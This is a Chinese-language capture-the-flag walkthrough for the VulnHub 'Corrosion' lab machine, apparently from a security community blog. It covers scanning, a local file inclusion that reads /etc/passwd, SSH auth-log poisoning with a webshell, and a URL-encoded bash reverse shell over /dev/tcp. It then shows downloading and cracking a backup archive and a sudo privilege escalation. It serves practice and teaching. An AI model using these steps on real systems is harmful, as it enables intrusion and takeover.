vulnhub-Corrosion靶机通关攻略

共 1433字,需浏览 3分钟

 ·

2021-09-05 23:18

作者:Kap 编辑:白帽子社区运营团队




    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    



 I. 信息收集

扫描主机
nmap -sP 192.168.189.*


端口扫描
nmap -sS -p 1-65535 -sV -v 192.168.189.129 


检测到80和22端口,尝试ssh弱口令无果,访问80端口。


目录扫描


打开/blog-post/后看到以下页面


因为是个目录,试试继续扫描该目录


发现一个跳转和一个uploads目录,继续扫描该目录


没有发现什么东西,再回头看看刚刚那个跳转目录


打开后没有任何东西

 II.漏洞利用

经过尝试,在.php后加上?file=/etc/passwd,但是/etc/shadow读取不了,猜测是权限不够。


然后发现可以读取/var/log/auth.log文件,这样的话可以尝试在ssh登陆时将一句话木马放在用户名的位置,将一句话送入用户登陆日志,再用文件包含去包含日志文件。


回到页面上,在url后加上&123=pwd
 ?file=/var/log/auth.log&123=pwd 

搜索/var,看到


将pwd命令改为whoami,再看相同位置
 ?file=/var/log/auth.log&123=whoami 


 III.反弹shell

?file=/var/log/auth.log&123=bash%20-c%20%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.189.130%2F7070+0%3E%261%27 


发现备份文件


使用curl下载到kali
curl http://192.168.189.129/blog-post/archives/randylogs.php?file=/var/backups/user_backup.zip -o user_backup.zip


下载成功后发现解压需要密码,使用rockyou字典爆破


解压


得到密码,尝试登陆靶机

登陆成功


 IV.提权

  查看普通用户可以使用的root命令


发现一个可以root权限执行的文件,打开对应目录,并执行


回到kali,将刚刚压缩包里的easysysinfo.c文件中的最后一个命令改为
bash -i


使用scp命令将文件传输到靶机上对应的目录中
 scp easysysinfo. c randy@192.168.189.129:/home/randy/tools/ 


先删掉eazysysinfo
 rm -rf easysysinfo

编译
 gcc easysysinfo.c -o easysysinfo 


运行

提权成功


往期精彩文章




zico靶机通关攻略
Vulnhub实战-Wakanda
实战|记一次完整的实战渗透经历
linux下的凭据窃取


技术支持:白帽子社区团队
— 扫码关注我们 


浏览 92
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报